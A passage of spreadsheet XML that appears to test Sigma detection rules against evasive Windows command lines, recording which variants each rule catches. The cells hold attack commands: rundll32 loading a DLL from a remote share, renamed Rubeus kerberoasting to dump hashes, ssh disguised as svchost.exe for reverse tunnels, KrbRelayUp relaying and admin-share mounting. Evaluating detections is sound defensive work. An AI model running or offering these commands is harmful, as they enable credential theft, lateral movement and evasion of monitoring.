      <c r="E183" s="36" t="inlineStr">
        <is>
          <t>rundll32.exe //192.168.1.1/share/payload.dll,EntryPoint</t>
        </is>
      </c>
      <c r="F183" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G183" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H183" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I183" s="43" t="n"/>
      <c r="J183" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K183" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="184" ht="15.75" customHeight="1" s="42">
      <c r="A184" s="43" t="inlineStr">
        <is>
          <t>t1218.011</t>
        </is>
      </c>
      <c r="B184" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_unc_path</t>
        </is>
      </c>
      <c r="C184" s="36" t="inlineStr">
        <is>
          <t>Rundll32 UNC Path Execution</t>
        </is>
      </c>
      <c r="D184" s="36" t="inlineStr">
        <is>
          <t>5cdb711b-5740-4fb2-ba88-f7945027afac</t>
        </is>
      </c>
      <c r="E184" s="36" t="inlineStr">
        <is>
          <t>rundll32.exe /"/192.168.1.1/share/payload.dll,EntryPoint"</t>
        </is>
      </c>
      <c r="F184" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G184" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H184" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I184" s="43" t="n"/>
      <c r="J184" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K184" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="185" ht="15.75" customHeight="1" s="42">
      <c r="A185" s="43" t="inlineStr">
        <is>
          <t>t1218.011</t>
        </is>
      </c>
      <c r="B185" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_unc_path</t>
        </is>
      </c>
      <c r="C185" s="36" t="inlineStr">
        <is>
          <t>Rundll32 UNC Path Execution</t>
        </is>
      </c>
      <c r="D185" s="36" t="inlineStr">
        <is>
          <t>5cdb711b-5740-4fb2-ba88-f7945027afac</t>
        </is>
      </c>
      <c r="E185" s="36" t="inlineStr">
        <is>
          <t>rundll32.exe -"/192.168.1.1/share/payload.dll,EntryPoint"</t>
        </is>
      </c>
      <c r="F185" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G185" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H185" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I185" s="43" t="n"/>
      <c r="J185" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K185" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="186" ht="15.75" customHeight="1" s="42">
      <c r="A186" s="43" t="inlineStr">
        <is>
          <t>t1218.011</t>
        </is>
      </c>
      <c r="B186" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_unc_path</t>
        </is>
      </c>
      <c r="C186" s="36" t="inlineStr">
        <is>
          <t>Rundll32 UNC Path Execution</t>
        </is>
      </c>
      <c r="D186" s="36" t="inlineStr">
        <is>
          <t>5cdb711b-5740-4fb2-ba88-f7945027afac</t>
        </is>
      </c>
      <c r="E186" s="36" t="inlineStr">
        <is>
          <t>rundll32.exe //192.168.1.1/SHAre/pAYLOAd.Dll,enTrypoiNT</t>
        </is>
      </c>
      <c r="F186" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G186" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H186" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I186" s="43" t="n"/>
      <c r="J186" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K186" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="187" ht="15.75" customHeight="1" s="42">
      <c r="A187" s="43" t="inlineStr">
        <is>
          <t>t1218.011</t>
        </is>
      </c>
      <c r="B187" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_unc_path</t>
        </is>
      </c>
      <c r="C187" s="36" t="inlineStr">
        <is>
          <t>Rundll32 UNC Path Execution</t>
        </is>
      </c>
      <c r="D187" s="36" t="inlineStr">
        <is>
          <t>5cdb711b-5740-4fb2-ba88-f7945027afac</t>
        </is>
      </c>
      <c r="E187" s="36" t="inlineStr">
        <is>
          <t>rundll32.exe //192.168.1.1/shAre/PaylOAD.dLl,EnTRYPOInt</t>
        </is>
      </c>
      <c r="F187" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G187" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H187" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I187" s="43" t="n"/>
      <c r="J187" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K187" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="188" ht="15.75" customHeight="1" s="42">
      <c r="A188" s="43" t="n"/>
      <c r="B188" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_rubeus</t>
        </is>
      </c>
      <c r="C188" s="36" t="inlineStr">
        <is>
          <t>HackTool - Rubeus Execution</t>
        </is>
      </c>
      <c r="D188" s="36" t="inlineStr">
        <is>
          <t>7ec2c172-dceb-4c10-92c9-87c1881b7e18</t>
        </is>
      </c>
      <c r="E188" s="36" t="inlineStr">
        <is>
          <t>copy C:\Tools\Rubeus.exe C:\Windows\Temp\not_malware.exe</t>
        </is>
      </c>
      <c r="F188" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G188" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H188" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I188" s="43" t="n"/>
      <c r="J188" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K188" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="189" ht="15.75" customHeight="1" s="42">
      <c r="A189" s="43" t="n"/>
      <c r="B189" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_rubeus</t>
        </is>
      </c>
      <c r="C189" s="36" t="inlineStr">
        <is>
          <t>HackTool - Rubeus Execution</t>
        </is>
      </c>
      <c r="D189" s="36" t="inlineStr">
        <is>
          <t>7ec2c172-dceb-4c10-92c9-87c1881b7e18</t>
        </is>
      </c>
      <c r="E189" s="43" t="inlineStr">
        <is>
          <t>copy C:\Tools\Rubeus.exe C:\Windows\Temp\not_malware.exe</t>
        </is>
      </c>
      <c r="F189" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G189" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H189" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I189" s="43" t="n"/>
      <c r="J189" s="43" t="n">
        <v>1</v>
      </c>
      <c r="K189" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="190" ht="15.75" customHeight="1" s="42">
      <c r="A190" s="43" t="n"/>
      <c r="B190" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_ssh_port_forward</t>
        </is>
      </c>
      <c r="C190" s="43" t="inlineStr">
        <is>
          <t>Port Forwarding Activity Via SSH.EXE</t>
        </is>
      </c>
      <c r="D190" s="43" t="inlineStr">
        <is>
          <t>327f48c1-a6db-4eb8-875a-f6981f1b0183</t>
        </is>
      </c>
      <c r="E190" s="43" t="inlineStr">
        <is>
          <t>ssh.exe -F ssh_config_with_forwarding.txt user@target</t>
        </is>
      </c>
      <c r="F190" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G190" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H190" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I190" s="43" t="n"/>
      <c r="J190" s="43" t="n">
        <v>1</v>
      </c>
      <c r="K190" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="191" ht="15.75" customHeight="1" s="42">
      <c r="A191" s="43" t="n"/>
      <c r="B191" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_ssh_port_forward</t>
        </is>
      </c>
      <c r="C191" s="43" t="inlineStr">
        <is>
          <t>Port Forwarding Activity Via SSH.EXE</t>
        </is>
      </c>
      <c r="D191" s="43" t="inlineStr">
        <is>
          <t>327f48c1-a6db-4eb8-875a-f6981f1b0183</t>
        </is>
      </c>
      <c r="E191" s="43" t="inlineStr">
        <is>
          <t>ssh.exe -o "RemoteForward 8080 localhost:80" user@10.10.10.10</t>
        </is>
      </c>
      <c r="F191" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G191" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H191" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I191" s="43" t="n"/>
      <c r="J191" s="43" t="n">
        <v>1</v>
      </c>
      <c r="K191" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="192" ht="15.75" customHeight="1" s="42">
      <c r="A192" s="43" t="n"/>
      <c r="B192" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_ssh_port_forward</t>
        </is>
      </c>
      <c r="C192" s="43" t="inlineStr">
        <is>
          <t>Port Forwarding Activity Via SSH.EXE</t>
        </is>
      </c>
      <c r="D192" s="43" t="inlineStr">
        <is>
          <t>327f48c1-a6db-4eb8-875a-f6981f1b0183</t>
        </is>
      </c>
      <c r="E192" s="43" t="inlineStr">
        <is>
          <t>ssh.exe -R8080:localhost:80 user@10.10.10.10</t>
        </is>
      </c>
      <c r="F192" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G192" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H192" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I192" s="43" t="n"/>
      <c r="J192" s="43" t="n">
        <v>1</v>
      </c>
      <c r="K192" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="193" ht="15.75" customHeight="1" s="42">
      <c r="A193" s="43" t="n"/>
      <c r="B193" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_ssh_port_forward</t>
        </is>
      </c>
      <c r="C193" s="43" t="inlineStr">
        <is>
          <t>Port Forwarding Activity Via SSH.EXE</t>
        </is>
      </c>
      <c r="D193" s="43" t="inlineStr">
        <is>
          <t>327f48c1-a6db-4eb8-875a-f6981f1b0183</t>
        </is>
      </c>
      <c r="E193" s="43" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\OpenSSH\ssh.exe C:\Temp\svchost.exe &amp;&amp; C:\Temp\svchost.exe -R 8080:localhost:80 user@10.10.10.10</t>
        </is>
      </c>
      <c r="F193" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G193" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H193" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I193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93" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K193" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="194" ht="15.75" customHeight="1" s="42">
      <c r="A194" s="43" t="n"/>
      <c r="B194" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_ssh_port_forward</t>
        </is>
      </c>
      <c r="C194" s="43" t="inlineStr">
        <is>
          <t>Port Forwarding Activity Via SSH.EXE</t>
        </is>
      </c>
      <c r="D194" s="43" t="inlineStr">
        <is>
          <t>327f48c1-a6db-4eb8-875a-f6981f1b0183</t>
        </is>
      </c>
      <c r="E194" s="43" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\OpenSSH\ssh.exe C:\Temp\svchost.exe &amp;&amp; C:\Temp\svchost.exe -r 8080:localhost:80 user@10.10.10.10</t>
        </is>
      </c>
      <c r="F194" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G194" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H194" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I194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94" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K194" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="195" ht="15.75" customHeight="1" s="42">
      <c r="A195" s="43" t="n"/>
      <c r="B195" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_ssh_port_forward</t>
        </is>
      </c>
      <c r="C195" s="43" t="inlineStr">
        <is>
          <t>Port Forwarding Activity Via SSH.EXE</t>
        </is>
      </c>
      <c r="D195" s="43" t="inlineStr">
        <is>
          <t>327f48c1-a6db-4eb8-875a-f6981f1b0183</t>
        </is>
      </c>
      <c r="E195" s="43" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\OpenSSH\ssh.exe C:\Temp\svchost.exe &amp;&amp; C:\Temp\svchost.exe /"R" 8080:localhost:80 user@10.10.10.10</t>
        </is>
      </c>
      <c r="F195" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G195" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H195" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I195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95" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K195" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="196" ht="15.75" customHeight="1" s="42">
      <c r="A196" s="43" t="n"/>
      <c r="B196" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_ssh_port_forward</t>
        </is>
      </c>
      <c r="C196" s="43" t="inlineStr">
        <is>
          <t>Port Forwarding Activity Via SSH.EXE</t>
        </is>
      </c>
      <c r="D196" s="43" t="inlineStr">
        <is>
          <t>327f48c1-a6db-4eb8-875a-f6981f1b0183</t>
        </is>
      </c>
      <c r="E196" s="43" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\OpenSSH\ssh.exe C:\Temp\svchost.exe &amp;&amp; C:\Temp\svchost.exe -"R" 8080:localhost:80 user@10.10.10.10</t>
        </is>
      </c>
      <c r="F196" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G196" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H196" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I196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96" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K196" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="197" ht="15.75" customHeight="1" s="42">
      <c r="A197" s="43" t="inlineStr">
        <is>
          <t>t1572</t>
        </is>
      </c>
      <c r="B197" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_plink_port_forwarding</t>
        </is>
      </c>
      <c r="C197" s="43" t="inlineStr">
        <is>
          <t>Suspicious Plink Port Forwarding</t>
        </is>
      </c>
      <c r="D197" s="43" t="inlineStr">
        <is>
          <t>48a61b29-389f-4032-b317-b30de6b95314</t>
        </is>
      </c>
      <c r="E197" s="43" t="n"/>
      <c r="F197" s="43" t="n"/>
      <c r="G197" s="43" t="n"/>
      <c r="H197" s="43" t="n"/>
      <c r="I197" s="43" t="n"/>
      <c r="J197" s="43" t="n"/>
      <c r="K197" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="198" ht="15.75" customHeight="1" s="42">
      <c r="A198" s="43" t="inlineStr">
        <is>
          <t>t1021.003</t>
        </is>
      </c>
      <c r="B198" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_mmc_mmc20_lateral_movement</t>
        </is>
      </c>
      <c r="C198" s="43" t="inlineStr">
        <is>
          <t>MMC20 Lateral Movement</t>
        </is>
      </c>
      <c r="D198" s="43" t="inlineStr">
        <is>
          <t>f1f3bf22-deb2-418d-8cce-e1a45e46a5bd</t>
        </is>
      </c>
      <c r="E198" s="43" t="inlineStr">
        <is>
          <t>C:\\WINDOWS\\system32\\mmc.exe -Embedding</t>
        </is>
      </c>
      <c r="F198" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G198" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H198" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I198" s="43" t="n"/>
      <c r="J198" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K198" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="199" ht="15.75" customHeight="1" s="42">
      <c r="A199" s="43" t="inlineStr">
        <is>
          <t>t1021.003</t>
        </is>
      </c>
      <c r="B199" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_mmc_mmc20_lateral_movement</t>
        </is>
      </c>
      <c r="C199" s="43" t="inlineStr">
        <is>
          <t>MMC20 Lateral Movement</t>
        </is>
      </c>
      <c r="D199" s="43" t="inlineStr">
        <is>
          <t>f1f3bf22-deb2-418d-8cce-e1a45e46a5bd</t>
        </is>
      </c>
      <c r="E199" s="43" t="inlineStr">
        <is>
          <t>"C:\\WINDOWS\\system32\\mmc.exe" -Embedding</t>
        </is>
      </c>
      <c r="F199" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G199" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H199" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I199" s="43" t="n"/>
      <c r="J199" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K199" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="200" ht="15.75" customHeight="1" s="42">
      <c r="A200" s="43" t="inlineStr">
        <is>
          <t>t1021.003</t>
        </is>
      </c>
      <c r="B200" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_mmc_mmc20_lateral_movement</t>
        </is>
      </c>
      <c r="C200" s="43" t="inlineStr">
        <is>
          <t>MMC20 Lateral Movement</t>
        </is>
      </c>
      <c r="D200" s="43" t="inlineStr">
        <is>
          <t>f1f3bf22-deb2-418d-8cce-e1a45e46a5bd</t>
        </is>
      </c>
      <c r="E200" s="43" t="inlineStr">
        <is>
          <t>C:\\WINDOWS\\system32\\mmc.exe  -Embedding</t>
        </is>
      </c>
      <c r="F200" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G200" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H200" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I200" s="43" t="n"/>
      <c r="J200" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K200" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="201" ht="15.75" customHeight="1" s="42">
      <c r="A201" s="43" t="inlineStr">
        <is>
          <t>t1021.003</t>
        </is>
      </c>
      <c r="B201" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_mmc_mmc20_lateral_movement</t>
        </is>
      </c>
      <c r="C201" s="43" t="inlineStr">
        <is>
          <t>MMC20 Lateral Movement</t>
        </is>
      </c>
      <c r="D201" s="43" t="inlineStr">
        <is>
          <t>f1f3bf22-deb2-418d-8cce-e1a45e46a5bd</t>
        </is>
      </c>
      <c r="E201" s="43" t="inlineStr">
        <is>
          <t>C:\\WINDOWS\system32\mmc.exe -Embedding</t>
        </is>
      </c>
      <c r="F201" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G201" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H201" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I201" s="43" t="n"/>
      <c r="J201" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K201" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="202" ht="15.75" customHeight="1" s="42">
      <c r="A202" s="43" t="inlineStr">
        <is>
          <t>t1003</t>
        </is>
      </c>
      <c r="B202" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_rubeus</t>
        </is>
      </c>
      <c r="C202" s="43" t="inlineStr">
        <is>
          <t>HackTool - Rubeus Execution</t>
        </is>
      </c>
      <c r="D202" s="43" t="inlineStr">
        <is>
          <t>7ec2c172-dceb-4c10-92c9-87c1881b7e18</t>
        </is>
      </c>
      <c r="E202" s="43" t="inlineStr">
        <is>
          <t>not_malware.exe kerberoast /outfile:C:\Windows\Temp\hashes.txt</t>
        </is>
      </c>
      <c r="F202" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G202" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H202" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I202" s="43" t="n"/>
      <c r="J202" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K202" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="203" ht="15.75" customHeight="1" s="42">
      <c r="A203" s="43" t="inlineStr">
        <is>
          <t>t1003</t>
        </is>
      </c>
      <c r="B203" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_rubeus</t>
        </is>
      </c>
      <c r="C203" s="43" t="inlineStr">
        <is>
          <t>HackTool - Rubeus Execution</t>
        </is>
      </c>
      <c r="D203" s="43" t="inlineStr">
        <is>
          <t>7ec2c172-dceb-4c10-92c9-87c1881b7e18</t>
        </is>
      </c>
      <c r="E203" s="43" t="inlineStr">
        <is>
          <t>not_malware.exe asreproast /user:admin /format:hashcat</t>
        </is>
      </c>
      <c r="F203" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G203" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H203" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I203" s="43" t="n"/>
      <c r="J203" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K203" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="204" ht="15.75" customHeight="1" s="42">
      <c r="A204" s="43" t="inlineStr">
        <is>
          <t>t1003</t>
        </is>
      </c>
      <c r="B204" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_rubeus</t>
        </is>
      </c>
      <c r="C204" s="43" t="inlineStr">
        <is>
          <t>HackTool - Rubeus Execution</t>
        </is>
      </c>
      <c r="D204" s="43" t="inlineStr">
        <is>
          <t>7ec2c172-dceb-4c10-92c9-87c1881b7e18</t>
        </is>
      </c>
      <c r="E204" s="43" t="inlineStr">
        <is>
          <t>not_malware.exe kerberoast /outfile:pass.txt</t>
        </is>
      </c>
      <c r="F204" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G204" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H204" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I204" s="43" t="n"/>
      <c r="J204" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K204" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="205" ht="15.75" customHeight="1" s="42">
      <c r="A205" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B205" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_impacket_lateral_movement</t>
        </is>
      </c>
      <c r="C205" s="43" t="inlineStr">
        <is>
          <t>HackTool - Potential Impacket Lateral Movement Activity</t>
        </is>
      </c>
      <c r="D205" s="43" t="inlineStr">
        <is>
          <t>10c14723-61c7-4c75-92ca-9af245723ad2</t>
        </is>
      </c>
      <c r="E205" s="43" t="inlineStr">
        <is>
          <t>"C:\Windows\System32\cmd.exe" /Q /c cd  1&gt; \\127.0.0.1\ADMIN$\__1567442499.05 2&gt;&amp;1</t>
        </is>
      </c>
      <c r="F205" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G205" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H205" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I205" s="43" t="n"/>
      <c r="J205" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K205" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="206" ht="15.75" customHeight="1" s="42">
      <c r="A206" s="43" t="inlineStr">
        <is>
          <t>t1090</t>
        </is>
      </c>
      <c r="B206" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_netsh_port_forwarding_3389</t>
        </is>
      </c>
      <c r="C206" s="43" t="inlineStr">
        <is>
          <t>RDP Port Forwarding Rule Added Via Netsh.EXE</t>
        </is>
      </c>
      <c r="D206" s="43" t="inlineStr">
        <is>
          <t>782d6f3e-4c5d-4b8c-92a3-1d05fed72e63</t>
        </is>
      </c>
      <c r="E206" s="43" t="inlineStr">
        <is>
          <t>netsh interface portproxy add v4tov4 listenport=3389 connectport=80 connectaddress=10.0.0.5</t>
        </is>
      </c>
      <c r="F206" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G206" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H206" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I206" s="43" t="n"/>
      <c r="J206" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K206" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="207" ht="15.75" customHeight="1" s="42">
      <c r="A207" s="43" t="inlineStr">
        <is>
          <t>t1558.003</t>
        </is>
      </c>
      <c r="B207" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_krbrelayup</t>
        </is>
      </c>
      <c r="C207" s="43" t="inlineStr">
        <is>
          <t>HackTool - KrbRelayUp Execution</t>
        </is>
      </c>
      <c r="D207" s="43" t="inlineStr">
        <is>
          <t>12827a56-61a4-476a-a9cb-f3068f191073</t>
        </is>
      </c>
      <c r="E207" s="43" t="inlineStr">
        <is>
          <t>copy KrbRelayUp.exe benign_tool.exe &amp;&amp; .\benign_tool.exe relay -Domain contoso.local -ComputerName target-host$</t>
        </is>
      </c>
      <c r="F207" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G207" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H207" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I207" s="43" t="n"/>
      <c r="J207" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K207" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="208" ht="15.75" customHeight="1" s="42">
      <c r="A208" s="43" t="inlineStr">
        <is>
          <t>t1558.003</t>
        </is>
      </c>
      <c r="B208" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_krbrelayup</t>
        </is>
      </c>
      <c r="C208" s="43" t="inlineStr">
        <is>
          <t>HackTool - KrbRelayUp Execution</t>
        </is>
      </c>
      <c r="D208" s="43" t="inlineStr">
        <is>
          <t>12827a56-61a4-476a-a9cb-f3068f191073</t>
        </is>
      </c>
      <c r="E208" s="43" t="inlineStr">
        <is>
          <t>set cmdArg1=krbscm &amp;&amp; set cmdArg2=-sc &amp;&amp; .\KrbRelayUp.exe %cmdArg1% %cmdArg2%</t>
        </is>
      </c>
      <c r="F208" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G208" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H208" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I208" s="43" t="n"/>
      <c r="J208" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K208" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="209" ht="15.75" customHeight="1" s="42">
      <c r="A209" s="43" t="inlineStr">
        <is>
          <t>t1558.003</t>
        </is>
      </c>
      <c r="B209" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_krbrelayup</t>
        </is>
      </c>
      <c r="C209" s="43" t="inlineStr">
        <is>
          <t>HackTool - KrbRelayUp Execution</t>
        </is>
      </c>
      <c r="D209" s="43" t="inlineStr">
        <is>
          <t>12827a56-61a4-476a-a9cb-f3068f191073</t>
        </is>
      </c>
      <c r="E209" s="43" t="inlineStr">
        <is>
          <t>UpdateService.exe "spawn" "-d" contoso.local "-cn" target-host$ "-cp" C:\Tools\payload.exe</t>
        </is>
      </c>
      <c r="F209" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G209" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H209" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I209" s="43" t="n"/>
      <c r="J209" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K209" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="210" ht="15.75" customHeight="1" s="42">
      <c r="A210" s="43" t="inlineStr">
        <is>
          <t>t1021.002</t>
        </is>
      </c>
      <c r="B210" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_sharpmove</t>
        </is>
      </c>
      <c r="C210" s="43" t="inlineStr">
        <is>
          <t>HackTool - SharpMove Tool Execution</t>
        </is>
      </c>
      <c r="D210" s="43" t="inlineStr">
        <is>
          <t>055fb54c-a8f4-4aee-bd44-f74cf30a0d9d</t>
        </is>
      </c>
      <c r="E210" s="43" t="inlineStr">
        <is>
          <t>SharpMove.exe computername=10.0.0.5 action=create</t>
        </is>
      </c>
      <c r="F210" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G210" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H210" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I210" s="43" t="n"/>
      <c r="J210" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K210" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="211" ht="15.75" customHeight="1" s="42">
      <c r="A211" s="43" t="inlineStr">
        <is>
          <t>t1021.002</t>
        </is>
      </c>
      <c r="B211" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_net_use_mount_admin_share</t>
        </is>
      </c>
      <c r="C211" s="43" t="inlineStr">
        <is>
          <t>Windows Admin Share Mount Via Net.EXE</t>
        </is>
      </c>
      <c r="D211" s="43" t="inlineStr">
        <is>
          <t>3abd6094-7027-475f-9630-8ab9be7b9725</t>
        </is>
      </c>
      <c r="E211" s="43" t="inlineStr">
        <is>
          <t>net use "\\Target\C$" P@ssw0rd1 /u:DOMAIN\Administrator</t>
        </is>
      </c>
      <c r="F211" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G211" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H211" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I211" s="43" t="n"/>
      <c r="J211" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K211" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="212" ht="15.75" customHeight="1" s="42">
      <c r="A212" s="43" t="inlineStr">
        <is>
          <t>t1021.002</t>
        </is>
      </c>
      <c r="B212" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_net_use_mount_admin_share</t>
        </is>
      </c>
      <c r="C212" s="43" t="inlineStr">
        <is>
          <t>Windows Admin Share Mount Via Net.EXE</t>
        </is>
      </c>
      <c r="D212" s="43" t="inlineStr">
        <is>
          <t>3abd6094-7027-475f-9630-8ab9be7b9725</t>
        </is>
      </c>
      <c r="E212" s="43" t="inlineStr">
